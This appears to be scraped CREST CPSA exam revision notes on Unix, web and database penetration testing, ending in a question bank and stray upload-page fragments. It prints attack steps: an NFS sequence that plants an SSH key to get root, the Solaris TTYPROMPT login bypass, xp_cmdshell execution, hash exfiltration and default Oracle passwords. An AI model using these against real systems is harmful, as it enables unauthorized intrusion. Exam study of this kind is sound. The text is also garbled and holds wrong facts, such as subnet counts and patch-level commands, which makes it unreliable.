E9) Common Windows Applications

5) Unix Security Assessment
F1) User Enumeration
rusers
The rusers command produces output similar to who, but for the list of hosts or all machines on the local
network. For each host responding to the rusers query, the hostname logged on is printed on each line. The
rusers command will wait for one minute to catch late responders.
The rusersd daemon is a server that responds to queries from the rusers command by returning a list of users
currently on the network. This daemon is normally started by the inetd daemon.
> rusers -a
Connects to rusersd RPC service and retrieves a list of logged-in users.

> nmap -sV --script=rusers <target>
rwho
The rwho command produces output similar to who, but for all machines on the local network. If no report has
been received from a machine for 11 minutes then rwho assumes the machine is down, and does not report
users last known to be logged into that machine.
> rwho -a
Rwhod is the server which maintains the database used by the rwho(1) and ruptime(1) programs.
SMTP (See also http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum)
Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY
or RCPT.
> smtp-user-enum.pl -M VRFY -U smtp_users.txt -t <IP>
Enumerating mail addresses.

> smtp-user-enum.pl -D example.com -M RCPT -U smtp_users.txt -t <IP>
Sample smtp_users.txt
Metasploit also offers a module. Only RHOSTS need to be set.

> use auxiliary/scanner/smtp/smtp_enum
finger
Finger may be used to look up users on a remote machine. The format is to specify a user as “user@host”, or
“@host”
Attempts to retrieve a list of usernames using the finger service.
> nmap -sV -sC <IP>
msf> use auxiliary/scanner/smtp/smtp_relay

msf auxiliary(smtp_relay) > show actions
...actions...
msf auxiliary(smtp_relay) > set ACTION <action-name>
msf auxiliary(smtp_relay) > show options
...show and set options...
msf auxiliary(smtp_relay) > run
F2) Unix Vulnerabilities
Password hashes in /etc/shadow on Unix systems
For understanding how this entire thing works, let's take the case of the previously shown example entry for
root user, from /etc/shadow file.
1 [root@slashroot1 ~]# cat /etc/shadow

2 root:$ 1 $Etg2ExUZ$F9NTP7omafhKIlqaBMqng1: 15651 : 0 : 99999 : 7 :::
From the above shown example entry, our topic of interest is the second field(the field with the encoded hash
of the password).
$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1
The above shown encoded hash value can be further classified into three different fields as below.
1. The first field is a numerical number that tell's you the hashing algorithm that's being used.
• $1 = MD5 hashing algorithm.
• $2 =Blowfish Algorithm is in use.
• $2a=eksblowfish Algorithm
• $5 =SHA-256 Algorithm
• $6 =SHA-512 Algorithm
2. The second field is the salt value
Salt value is nothing but a random data that's generated to combine with the original password, inorder to
increase the strength of the hash.
3.The last field is the hash value of salt+user password (we will be discussing this shortly).
So in our example entry of root, as shown below,

$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1
The above shown encoded password is using MD5 hashing algorithm (because the of $1$)
Salt value is Etg2ExUZ (the content between the second and third $ sign)
And the hash value of "PASSWORD + SALT".
Post Exploitation
Exfiltrate Password Hashes:
• Downloading files (/etc/passwdand /etc/shadow) throughmeterpretershell
• Get files (/etc/passwdand /etc/shadow) through path traversal
• Get hashes through SQL injection
Crack Password Hashes, see Crack Password Hashes(OfflineAnalysis)
Check Patch level

• Get kernel version (Generic)
o uname -a
• Get the Ubuntu version

o cat /etc/lsb-release
o cat /etc/issue
o dpkg-l | grep -i <package> // search installed version of specific package name, e.g.jboss
• Get the Red Hat version

o cat /etc/redhat-release
o rpm -qa| grep -i <package> // search installed version of specific package name, e.g. jobs
F3) FTP
FTP access control

FTP access can be limited to certain
• IP addresses and/or IP ranges that are allowed to connect.
• Usernames that are allowed to connect.
• times, by usinglogontime restrictions (e.g. login only possible from 9am to 6pm).
• commands that can be executed once logged in.
• Read/Write access to files/directories once logged in (Access Control Lists, ACL)
• directories (jailed) once logged in.
• Quotas (limit the amount of disk space a user has once logged in).
Also enable a strong password policy and define a threshold for failed login attempts so brute forcing of
accounts is not possible.
Anonymous access to FTP servers
Anonymous access is often enabled by default in FTP servers and should be disabled on production systems if
not needed. Username should be "anonymous" and password the mail address (which can be any random
string also).
% ftp naic.nasa.gov
Connected to naic.nasa.gov.
220 naic.nasa.gov FTP server (Wed May 4 12:15:15 PDT 1994) ready.
Name (naic.nasa.gov:amarine): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-----------------------------------------------------------------
230-Welcome to the NASA Network Applications and Info Center Archive
230-
Risks of allowing write access to anonymous users.

CIA (Confidentiality, Integrity and Availability) cannot be ensured when enabling write access to anonymous
users.
• Files can be overwritten by unknown users.
• Files canmodified by unknown users.
• Files can be uploadeduntilthe disk space is full which can lead to a DoS of the server.
• Logging is almost useless as anonymous username cannot be linked to an individual.
F4) Sendmail / SMTP
Valid username discovery via EXPN and VRFY

-> See "User Enumeration - Unix / SMTP"
Awareness of recent Sendmail vulnerabilities; ability to exploit them if possible

Check Metasploit... Postfix is nowadays more widely used thensendmail.
https://www.cvedetails.com/vulnerability-list/vendor_id-31/Sendmail.html
Mail relaying
Check with Nmap:
nmap --script smtp-open-relay.nse -p 25,465,587 <host>
Arguments: [--script-args smtp-open-relay.domain=<domain>,smtp-open-relay.ip=<address>,...]
Metasploit:
msf > use auxiliary/scanner/smtp/smtp_relay
msf auxiliary(smtp_relay) > show actions
...actions...
msf auxiliary(smtp_relay) > set ACTION <action-name>
msf auxiliary(smtp_relay) > show options
...show and set options...
msf auxiliary(smtp_relay) > run
Manual open relay test.:
nc <Host> <SMTP Port, e.g. 25>
HELO local.domain.name
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
Subject: your subject line here
Hello world! I am the test email.
.
QUIT
F5) Network File System (NFS)
http://www.tldp.org/HOWTO/NFS-HOWTO/security.html
NFS security: host level (exports restricted to particular hosts) and file level (by UID and GID).
Configuration is done in /etc/exports (also /etc/hosts.deny and /etc/hosts.alllow). This file lists the names or IP
addresses for machines that are allowed to access a share point. If the client'sipaddress matches one of the
entries in the access list then it will be allowed to mount.
IMPORTANT: Do not put anything but IP NUMBERS in the portmap lines of these files. Host name lookups can
indirectly cause portmap activity which will trigger host name lookups which can indirectly cause portmap
activity which will trigger...
The second step is file access. This is a function of normal file system access controls on the client and not a
specialized function of NFS. Once the drive is mounted the user and group permissions on the files determine
access control.
Root squashing, nosuid and noexec options.

root_squash — Prevents root users connected remotely from having root privileges and assigns them the user
ID for the user nfs nobody. This effectively "squashes" the power of the remote root user to the lowest local
user, preventing unauthorized alteration of files on the remote server. Alternatively, the no_root_squash
option turns off root squashing. To squash every remote user, including root, use the all_squash option.
On the client we can decide that we don't want to trust the server too much a couple of ways with options to
mount. For example, we can forbid suid programs to work off the NFS file system with the nosuid option.
Some unix programs, such as passwd, are called "suid" programs: They set the id of the person running them
to whomever is the owner of the file. If a file is owned by root and is suid, then the program will execute as
root, so that they can perform operations (such as writing to the password file) that only root is allowed to do.
Using the nosuid option is a good idea and you should consider using this with all NFS mounted disks. It means
that the server's root user cannot make a suid-root program on the file system, log in to the client as a normal
user and then use the suid-root program to become root on the client too. One could also forbid execution of
files on the mounted file system altogether with the no exec option. But this is more likely to be impractical
than nosuid since a file system is likely to at least contain some scripts or programs that need to be executed.
See also File System Permissions - Unix.
File access through UID and GID manipulation.

Abusing Hardlinks via NFS
Getting root with NFS

# Check whether NFS is running
rpcinfo -p X.X.X.X
#See what can be mounted
showmount -e X.X.X.X
Export list for X.X.X.X
/*
# Jackpot
# Mount the root file system
mkdir /tmp/r00t
mount -t nfs X.X.X.X:/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
umount /tmp/r00t
# connect as root
ssh [email protected]
F6) R* services
Access control (/etc/hosts.equiv and .rhosts)
http://manpages.ubuntu.com/manpages/trusty/man5/hosts.equiv.5.html
The hosts.equiv file allows or denies hosts and users to use the r-
commands (e.g., rlogin, rsh or rcp) without supplying a password.
The file uses the following format:
[ + | - ] [hostname] [username]
The .rhosts file is in the user home directory under Unix and contains a list of username and IP address or
machine hostname pairs, such as the following:
# pwd
/home/chris
# cat .rhosts
chris mail.trustmatta.com
+ 192.168.0.55
In this example, I can use any of the r-services (rsh, rlogin, or rexec) to connect to this host from
mail.trustmatta.com if I am logged into the host as chris or from 192.168.0.55 with any username on that host.
When a user connects to the host running rshd(the remote shell daemon running on TCP port 514), the source
IP address is cross-referenced against the .rhosts file, and the username is verified by querying the identd
service running at the source. If these details are valid, direct access is given to the host without even requiring
a password.
Rlogin:
rlogin -l root X.X.X.X

Trust relationships
F7) X11
Arguments Against a GUI

(https://help.ubuntu.com/community/ServerGUI#Arguments_Against_a_GUI)
Most Ubuntu Server developers recommend not installing a GUI on a server. There are multiple reasons for
not installing a GUI.
Some reasons to not install a GUI include:

• You'll have more code subject to security vulnerabilities, more packages that need updating, and
more server downtime.
• Performance may suffer because resources (memory, hard disk space, CPU, etc.) will be consumed by
the GUI.
• It is best practice to only install needed software on a production server.
• The GUI may include other network services that are inappropriate for a server.
o One of the goals of Ubuntu Desktop Edition is to make it easier for users to use Linux. When
installing some desktop environments, services that you may not specifically want will be
installed. For example avahi-daemon, which is used to help configure networking, adds
another open port and may introduce unwanted DNS conflicts with a .local domain.
• If you're using an Ubuntu LTS release prior to 12.04 LTS, X11 and desktop packages are not supported
for the full 5-year lifecycle of the LTS server release. So, for the most secure server it is best to not
install a GUI.
Copied from Wikipedia:

Host-based access[edit]
The host-based access method consists in specifying a set of hosts that are authorized to connect to the X
display server. This system has inferior security, as it allows every user who has access to such a host to
connect to the display. The xhost program and three X Window System core protocol requests are used to
activate this mechanism and to display and change the list of authorized hosts. Improper use of xhost can in
advertently give every host on the Internet full access to an X display server.
Cookie-based access[edit]
The cookie-based authorization methods are based on choosing a magic cookie (an arbitrary piece of data) and
passing it to the X display server when it is started; every client that can prove having knowledge of this cookie
is then authorized connection to the server.
These cookies are created by a separate program and stored in the file .Xauthority in the user's home
directory, by default. As a result, every program run by the client on the local computer can access this file and
therefore the cookie that is necessary for being authorized by the server. If the user wants to run a program
from another computer on the network, the cookie has to be copied to that other computer. How the cookie is
copied is a system-dependent issue: for example, on Unix-like platforms, scp can be used to copy the cookie.
The two systems using this method are MIT-MAGIC-COOKIE-1 and XDM-AUTHORIZATION-1. In the first
method, the client simply sends the cookie when requested to authenticate. In the second method, a secret
key is also stored in the .Xauthority file. The client creates a string by concatenating the current time, a
transport-dependent identifier, and thecookie, encrypts the resultingstring, and sends it to the server.
The xauth application is a utility for accessing the .Xauthority file.
User-based access[edit]
The user-based access methods work by authorizing specific users to connect to the server. When a client
establishes a connection to a server, it has to prove being controlled by an authorized user.
The two methods based on authenticating users using networked identity management systems are SUN-DES-
1 andMIT-KERBEROS-5. The first system is based on a secure mechanism of the ONC remote procedure
call system developed in SunOS. The second mechanism is based on both client and server trusting
a Kerberos server.
A third method is limited to local connections, using system calls to ask the kernel what user is on the other
end of a local socket. The xhost program can be used to add or remove localuser and localgroup entries with
this method.[1]
F8) RPC services
The RPC program identification probes are done in parallel, and retransmissions are handledforUDP ports. This
feature is automatically activated whenever version detection finds any RPC ports. Example 7.6 demonstrates
direct RPC scanning done as part of version detection.
# nmap-F -A -sSU ultra

# nmap-sR <target>
# nmap--scriptrpc-grind <target>
Also possible by usingrpcinfo:
#rpcinfo-p <target>
Common RPC vulnerabilities:

Check Metasploit and exploit-db.
F9) SSH
Identify the types and versions of SSH software in use
nmapscan
ssh -v <target>
Securing SSH
See http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html
• Only Use SSH Protocol 2
• Limit Users’ SSH Access (AllowUsers directive)
• Configure Idle Log Out Timeout Interval
• Disable .rhosts Files
• Disable Host-Based Authentication
• Disable root Login via SSH
• Enable a Warning Banner
• Use Public Key Based Authentication
• Chroot SSHD (Lock Down Users To Their Home Directories)
• Disable Empty Passwords
• Thwart SSH Crackers (Brute Force Attack) by using tools like fail2ban
• Use Log Analyzer
• Patch OpenSSH and Operating Systems
SSH 1 and SSH 2

In fact, SSH1 and SSH2 are two entirely different protocols with no compatibility in between. SSH2 is a
significantly improved version of SSH1 in many respects. First of all, while SSH1 is a monolithic design where
several different functions (e.g., authentication, transport, connection) are packed into a single protocol, SSH2
is a layered architecture designed with extensibility and flexibility in mind. In terms of security, SSH2 comes
with a number of stronger security features than SSH1, such as MAC-based integrity check, flexible session re-
keying, fully-negotiable cryptographic algorithms, public-key certificates, etc.
SSH2 is standardized by IETF, and as such its implementation is widely deployed and accepted in the industry.
Due to SSH2's popularity and cryptographic superiority over SSH1, many products are dropping support for
SSH1. As of this writing, OpenSSH still supports both SSH1 and SSH2, while on all modern Linux distributions,
OpenSSH server comes with SSH1 disabled by default.
Authentication mechanisms within SSH

Username/password combination tologin.
Login by usingkeypair (public key is onserverin <home>/.ssh/authorized_hosts,privatekey needed tologin).

6) Web Technologies
G1) Web Server Operation
3 layers of architecture
• Web Server
• Application Server
• Database Server
G2) Web Servers & their Flaws

Fundamental differences:
1. Apache is free while IIS is packaged with Windows Server.
2. IIS only runs on Windows while Apache can run on almost any OS including UNIX, Windows, Apple’s OS X,
and on most Linux Distributions.
3. ASPX runs only in IIS.
IIS (Internet Information Services)

Wikipedia:
By default IIS 5.1 and earlier run websites in a single process running the context of the System account,[51] a
Windows account with administrative rights. Under 6.0 all request handling processes run in the context of the
Network Service account, which has significantly fewer privileges, so that should there be a vulnerability in a
feature or incustomcode it won't necessarily compromise the entire system given the sandboxed environment
these worker processes run in.[52] IIS 6.0 also contained a new kernel HTTP stack (http.sys) with a stricter
HTTP request parser and response cache for both static and dynamic content.[53]
https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-3436/Microsoft-IIS.html
http://blog.trendmicro.com/trendlabs-security-intelligence/iis-at-risk-the-http-protocol-stack-vulnerability/
Apache
There are still two major branches:
• Apache 2.2
• Apache 2.4
Features in 2.4, compared to 2.2: https://httpd.apache.org/docs/2.4/new_features_2_4.html
G3) Web Enterprise Architectures

In software engineering, multitier architecture (often referred to as n-tier architecture) is a client–server
architecture in which presentation, application processing, and data management functions are physically
separated. The most widespread use of multitier architecture is the three-tier architecture.
Three-tier architecture:
• Presentation tier This is the topmost level of the application. The presentation tier displays
information related to such services as browsing merchandise, purchasing and shopping cart
contents. It communicates with other tiers by which it puts out the results to the browser/client tier
and all other tiers in the network. In simple terms, it is a layer which users can access directly (such as
a web page, or an operating system's GUI).
• Application tier (business logic, logic tier, or middle tier) The logical tier is pulled out from the
presentation tier and, as its own layer, it controls an application’s functionality by performing detailed
processing.
• Data tier The data tier includes the data persistence mechanisms (database servers, file shares, etc.)
and the data access layer that encapsulates the persistence mechanisms and exposes the data. The
data access layer should provide an API to the application tier that exposes methods of managing the
stored data without exposing or creating dependencies on the data storage mechanisms. Avoiding
dependencies on the storage mechanisms allows for updates or changes without the application tier
clients being affected by or even aware of the change. As with the separation of any tier, there are
costs for implementation and often costs to performance in exchange for improved scalability and
maintainability.
Logical layers are merely a way of organizing your code. Typical layers include Presentation, Business and Data
– the same as the traditional 3-tier model. But when we’re talking about layers, we’re only talking about logical
organization of code. In no way is it implied that these layers might run on different computers or in different
processes on a single computer or even in a single process on a single computer. All we are doing is discussing
a way of organizing a code into a set of layers defined by specific function.
Physical tiers however, are only about where the code runs. Specifically, tiers are places where layers are
deployed and where layers run. In other words, tiers are the physical deployment of layers.
MVC
Model–view–controller (MVC) is a software architectural pattern for implementing user interfaces on
computers. It divides a given software application into three interconnected parts, so as to separate internal
representations of information from the ways that information is presented to or accepted from the
user.[1][2]
Traditionally used for desktop graphical user interfaces (GUIs), this architecture has become popular for
designing web applications.
G4) Web Protocols
HTTP
Unencrypted
HTTPS
Encrypted
SOAP
SOAP (Simple Object Access Protocol) is a protocol specification for exchanging structured information in the
implementation of web services in computer networks. SOAP allows processes running on disparate operating
systems (such as Windows and Linux) to communicate using Extensible Markup Language (XML).
SOAP provides the Messaging Protocol layer of a web services protocol stack for web services. It is XML-based
protocol consisting of three parts:
• an envelope, which defines the message structure and how to process it
• a set of encoding rules for expressing instances of application-defined datatypes
• a convention for representing procedure calls and responses
Example:
POST /InStock HTTP/1.1
Host: www.example.org
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 299
SOAPAction: "http://www.w3.org/2003/05/soap-envelope"
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
</soap:Header>
<soap:Body>
<m:GetStockPrice xmlns:m="http://www.example.org/stock/Surya">
<m:StockName>IBM</m:StockName>
</m:GetStockPrice>
</soap:Body>
</soap:Envelope>
HTTP Web Methods

GET
The GET method requests a representation of the specified resource. Requests using GET should only retrieve
data and should have no other effect. (This is also true of some other HTTP methods.)[1] The W3C has
published guidance principles on this distinction, saying, "Web application design should be informed by the
above principles, but also by the relevant limitations."[13] See safe methods below.
HEAD
The HEAD method asks for a response identical to that of a GET request, but without the response body. This is
useful for retrieving meta-information written in response headers, without having to transport the entire
content.
POST
The POST method requests that the server accept the entity enclosed in the request as a new subordinate of
the web resource identified by the URI. The data POSTed might be, for example, an annotation for existing
resources; a message for a bulletin board, newsgroup, mailing list, or comment thread; a block of data that is
the result of submitting a web form to a data-handling process; or an item to add to a database.[14]
PUT
The PUT method requests that the enclosed entity be stored under the supplied URI. If the URI refers to an
already existing resource, it is modified; if the URI does not point to an existing resource, then the server can
create the resource with that URI.[15]
DELETE
The DELETE method deletes the specified resource.
TRACE
The TRACE method echoes the received request so that a client can see what (if any) changes or additions
have been made by intermediate servers.
OPTIONS
The OPTIONS method returns the HTTP methods that the server supports for the specified URL. This can be
used to check the functionality of a web server by requesting '*' instead of a specific resource.
CONNECT
[16] The CONNECT method converts the request connection to a transparent TCP/IP tunnel, usually to
facilitate SSL-encrypted communication (HTTPS) through an unencrypted HTTP proxy.[17][18] See HTTP
CONNECT tunneling.
PATCH
The PATCH method applies partial modifications to a resource.[19]
All general-purpose HTTP servers are required to implement at least the GET and HEAD methods,[20] and,
whenever possible, also the OPTIONS method.
Response Codes
1xx Informational
• 100 Continue, The server has received the request headers and the client should proceed to send the
request body
• 101 Switching Protocols, e.g. when switching from HTTP to HTTP2
2xx Success
• 200 OK, Standard response for successful HTTP requests.
3xx Redirection
• 301 Moved Permanently, This and all future requests should be directed to the given URI.
• 302 Found, This is an example of industry practice contradicting the standard. The HTTP/1.0
specification (RFC 1945) required the client to perform a temporary redirect (the original describing
phrase was "Moved Temporarily"),[21] but popular browsers implemented 302 with the functionality
of a 303 See Other. Therefore, HTTP/1.1 added status codes 303 and 307 to distinguish between the
two behaviours.[22] However, some Web applications and frameworks use the 302 status code as if it
were the 303
• 303 See Other
• 304 Not Modified
4xx Client Error

• 400 Bad Request
• 401 Unauthorised
• 403 Forbidden
• 404 Not Found
• 405 Method Not Allowed
5xx Server Error
• 500 Internal Server Error
• 501 Not Implemented
• 502 Bad Gateway
• 503 Service Unavailable
HTTP Header Fields relating to security features

• HTTP Strict Transport Security (HSTS): HTTP Strict Transport Security (HSTS) is a web security policy
mechanism which helps to protect websites against protocol downgrade attacks and cookie hijacking.
• Public Key Pinning Extension for HTTP (HPKP): HTTP Public Key Pinning (HPKP) is a security mechanism
which allows HTTPS websites to resist impersonation by attackers using mis-issued or otherwise
fraudulent certificates.
• X-Frame-Options: X-Frame-Options response header improve the protection of web applications
against Clickjacking.
• X-XSS-Protection: This header enables the Cross-site scripting (XSS) filter in your browser.
• X-Content-Type-Options: Setting this header will prevent the browser from interpreting files as something
else than declared by the content type in the HTTP headers.
• Content-Security-Policy: Content Security Policy (CSP) requires careful tuning and precise definition of the
policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript
disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks,
including Cross-site scripting and other cross-site injections.
• X-Permitted-Cross-Domain-Policies: A cross-domain policy file is an XML document that grants a web
client, such as Adobe Flash Player or Adobe Acrobat (though not necessarily limited to these), permission
to handle data across domains.
G5) Web Mark-up Languages
7) Web Testing Methodologies

H6) Input Validation
White listing allows a certain character set (e.g. only numbers for a parameter called ID) and denies everything
else.
Black listing denies certain character sets (e.g. forbids some special characters like < or >) and allows
everything else.
Data sanitisation is filtering/validating the input/data before it is being used within an application by escaping
special characters (e.g. < is replaced with <). Can for example be achieved in PHP by setting
filter.default="special_chars" in php.ini. When using the function filter_input all data is sanitised and special
characters cannot be rendered by the browser anymore.
H9) Use of Cross Site Scripting Attacks
XSS can lead to:

• Website defacement
• Attacking users of the application (e.g. with BeEF - The Browser Exploitation Framework Project)
• Phishing
H10) Use of Injections Attacks
Cheat Sheet for SQL Injection attacks http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-

cheat-sheet
SQL Injection for Microsoft SQL Server to execute command shell:

xp_cmdshell: Spawns a Windows command shell and passes in a string for execution.
Command:
EXEC xp_cmdshell 'dir *.exe';
By default, the xp_cmdshell option is disabled since Microsoft SQL Server 2005. Before it was enabled by
default.
The following useful stored procedures are found in Microsoft SQL Server:
• xp_cmdshell
• sp_makewebtask
• xp_regread
Get version string

SELECT @@version
H11) Session Handling

• Session is not getting renewed after logging
• Session ID generation is weak
• Session is not getting terminated on server side after logging out / timing out.
• Session is not sent over TLS
• Session is sent in URL (Session rewriting) instead of usage of cookies. If that's done the Session ID is
disclosed in the cache and in web server logs.
H12) Encryption
Encrypting data in transit:
• Sent data by using an encrypted channel (HTTPS, FTPS, SSH) between client and server.
• Encrypt data before data is being sent (by using Symmetric Encryption like AES, or Asymmetric like
PGP)
Encrypting data at rest:

• Encrypt data at rest by using Symmetric Encryption like AES, or Asymmetric like PGP.
• Use transparent mechanisms like Transparent Data Encryption (TDE) in MSSQL to encrypt data.
• Encrypt the whole hard disk on a server/client.
Identification and exploitation of Encoded values (e.g. Base64)

Encoded values like Base64 can be identified through the character set used. The longer the string to encode
the longer the base64 encoded value. It can easily be decoded, it's just a different representation of data.
Identification and exploitation of Cryptographic values (e.g. MD5 hashes)

A hash is a one way function with a fixed length. Example
Hashes: https://hashcat.net/wiki/doku.php?id=example_hashes. According to the length and character set
used it can be identified what kind of hash is used.
It cannot easily identified what kind of encryption has been used for encrypted data as it is just a blob.
Common SSL Vulnerabilities:

SSLv2 should not be used as it is considered broken already for a long time.
SSLv3 should not be used nowadays anymore as this protocol is considered broken (POODLE)
RC4 should not be used as cipher as it is considered as broken.
POODLE (Padding Oracle On Downgraded Legacy Encryption)
BEAST (Browser Exploit Against SSL/TLS)
BREACH (Browser Reconnaissance & Exfiltration via Adaptive Compression of Hypertext)
Heartbleed Bug
CRIME (Compression Ratio Info-leak Made Easy)
FREAK (Factoring Attack on RSA-EXPORT Keys)
DROWN (DROWN stands for Decrypting RSA with Obsolete and Weakened eNcryption)
H13) Source Code Review
Source Code Review is checking for bad practices/known vulnerabilities on the source code level (e.g. using
concatenated strings for SQL queries instead of prepared statements or wrongly implemented encryption)
Automated approach:
• Static application security testing (SAST) is a set of technologies designed to analyze application
source code, byte code and binaries for coding and design conditions that are indicative of security
vulnerabilities. SAST solutions analyze an application from the “inside out” in a nonrunning state.
• Dynamic Application Security Testing (DAST) technologies are designed to detect conditions
indicative of a security vulnerability in an application in its running state. Most DAST solutions test
only the exposed HTTP and HTML interfaces of Web-enabled applications; however, some solutions
are designed specifically for non-Web protocol and data malformation (for example, remote
procedure call, Session Initiation Protocol [SIP] and so on).
8) Database
J1) Microsoft SQL Server
Microsoft SQL Server (MSSQL)

Running on port 1433 (normal mode)
Running on port 2433 (hidden mode)
Attack Vector
Recon with Nmap to identify Service Pack Level and version.
Brute Forcing DB accounts (Hydra)
msf> use auxiliary/scanner/mssql/mssql_ping

msf> set RHOSTS <IP>
msf> run
Privilege Escalation
Credentials are needed and set, then metasploit can check for security issues.
msf> use auxiliary/admin/mssql/mssql_enum
msf> run
J2) Oracle RDBMS
Oracle TNS (Transparent Network Substrate) running on port 1521

TNS is a proprietary Oracle computer-networking technology, supports homogeneous peer-to-peer
connectivity on top of other networking technologies such as TCP/IP, SDP and named pipes. TNS operates
mainly for connection to Oracle databases.
Get Patch information from an Oracle DB

This lists the interim patches applied on oracle binaries.
$ opatch lsinventory -details
The patches applied on DB are listed with:

select * from sys.registry$history;
Derivation of version and patch information from hosts running Oracle software.
Version information:
SELECT * FROM v$version;
This query would output something like this:
Banner
--------------------------------------------------------------------------------------
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production
CORE 11.2.0.2.0 Production
TNS for Linux: Version 11.2.0.2.0 - Production
NLSRTL Version 11.2.0.2.0 - Production
sqlmap -r request.txt -p id --dbms=oracle --banner
#1521 is the default port of Oracle DB (Oracle Net Listener)

nmap -p 1521 <IP>
tnscmd10g version -h <IP>

tnscmd10g status -h <IP>
msf > use auxiliary/scanner/oracle/sid_enum

msf auxiliary(tnslsnr_version) > run
Default Oracle accounts

Role Name Password
ORD_SERVER ODS
WKADMIN WKADMIN
WKUSER WKUSER
WKSYS WKSYS
SCOTT TIGER
SYSTEM MANAGER
DBSNMP DBSNMP
SYS CHANGE_ON_INSTALL
OUTLN OUTLN
MDSYS MDSYS
CTXSYS CTXSYS
ORDSYS ORDSYS
ANONYMOUS ANONYMOUS
What is Oracle SID?

Oracle System ID
The Oracle System ID (SID) is used to uniquely identify a particular database on a system. For this reason, one
cannot have more than one
database with the same SID on a computer system.
J3 Web / App / Database Connectivity

When a Web application involves database access, it must provide credentials to SQL Server (that is, it must
log in to SQL Server) just as any other user or process would to be able to interact with the database.
Therefore, special drivers or connectors are needed, for the different programming languages available:
ADO.NET is a data access technology from the Microsoft .NET Framework which provides communication
between relational and non-relational systems through a common set of components.ADO.NET is a set of
computer software components that programmers can use to access data and data services from the
database.
Java Database Connectivity (JDBC)

Is an application programming interface (API) for the programming language Java, which defines how a client
may access a database. It is part of the Java Standard Edition platform, from Oracle Corporation.
Open Database Connectivity (ODBC)

ODBC is an open standard application programming interface (API) for accessing a database.
OLE DB (Object Linking and Embedding, Database, sometimes written as OLEDB or OLE-DB)
Is an API designed by Microsoft, allows accessing data from a variety of sources in a uniform manner. The API
provides a set of interfaces implemented using the Component Object Model (COM); it is otherwise unrelated
to OLE.
Some Questions Bank
Which OS is vulnerable to sadmind RCE ?

Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems and
subsequently installs software to attack Microsoft IIS web servers. In addition, it includes a component to
propagate itself automatically to other vulnerable Solaris systems.
(http://www.cert.org/historical/advisories/CA-2001-11.cfm)
What is the exploit technique behind solaris TTYPROMPT login bypass ?
https://packetstormsecurity.com/files/114491/Solaris-TTYPROMPT-Remote-Login-Bypass.html
Solaris TTYPROMPT Security Vulnerability (Telnet)
This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker.
The vulnerability only requires the attacker to simply define the environment variable TTYPROMPT to a 6-
character string, inside telnet. Jonathan believes this overflows an integer inside login, which specifies whether
the user has been authenticated (just a guess).
Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You
will then be logged in as the user without any password authentication. This should work with any account
except root (unless remote root login is allowed).
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami bin
What tool is used to trace files an executable has accessed to when it is run in Linux?
/usr/bin/strace
What command is used to check OS patch level in windows?

Get-HotFix
Internal IP range stated in RFC 1918

10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
What is the default port of DB2?

TCP 50000
-rwxr-xr-x 1 root root file1

can non-root user copy the file above?
Yes, copy doesn't require write access
What is the exploit on linuxbash 4.1?

Shellshock exploit
What is the command in Linux to check patch level?

patch -p
What is CRLF stands for?

Carriage Return Line Feed

Squid proxy

Ingres
How many TCP ports in total?
65535 ports
What is SOA stands for?

Start of Authority
What is the subnet mask for /23 network?

255.255.254.0
What is the command to perform domain transfer in Linux?

dig @server domain axfr
What is WSDL stands for?

Web Services Description Language
What is SCADA stands for?

Supervisory control and data acquisition
Which is not part of HTTP header?

PROPGET
How to know blind spoofing response?

Sequence Numbers
XML Injection on?

SOAP (Simple Object Access Protocol)
What is the Vulnerabilities in PHP CGI

Query String Code Execution
In vulnerable configurations, PHP treats certain query string parameters as command line arguments including
switches such as '-s', '-d', and '-c'.

Cpsa Crest Revision 1) Core Technical Skills: IGRP - Interior Gateway Routing Protocol

Uploaded by

Cpsa Crest Revision 1) Core Technical Skills: IGRP - Interior Gateway Routing Protocol

Uploaded by

CPSA CREST REVISION

1) Core Technical Skills

0x02 2 IGMP Internet Group Management Protocol RFC 1112

0x03 3 GGP Gateway-to-Gateway Protocol RFC 823

0x06 6 TCP Transmission Control Protocol RFC 793

What is the subnet mask for /23 network?

What port to open for VPN services? (AH,ESP)

c) SSTP tunnel uses TCP port 443 (SSL)

What is the default port of DB2?

What is running on port 3128?

What is running on Port 1524?

How many TCP ports in total?

What is running on port 1723?

CIDR /4 240,435,456 11110000 00000000 00000000 00000000 240.0.0.0

CIDR /5 134,217,728 11111000 00000000 00000000 00000000 248.0.0.0

CIDR /6 67,108,864 11111100 00000000 00000000 00000000 252.0.0.0

CIDR /7 33,554,432 11111110 00000000 00000000 00000000 254.0.0.0

A /8 16,777,216 11111111 00000000 00000000 00000000 255.0.0.0

CIDR /9 8,388,608 11111111 10000000 00000000 00000000 255.128.0.0

CIDR /10 4,194,304 11111111 11000000 00000000 00000000 255.192.0.0

CIDR /11 2,097,152 11111111 11100000 00000000 00000000 255.224.0.0

CIDR /12 1,048,576 11111111 11110000 00000000 00000000 255.240.0.0

CIDR /13 524,288 11111111 11111000 00000000 00000000 255.248.0.0

CIDR /14 262,144 11111111 11111100 00000000 00000000 255.252.0.0

CIDR /15 131,072 11111111 11111110 00000000 00000000 255.254.0.0

B /16 65,534 11111111 11111111 00000000 00000000 255.255.0.0

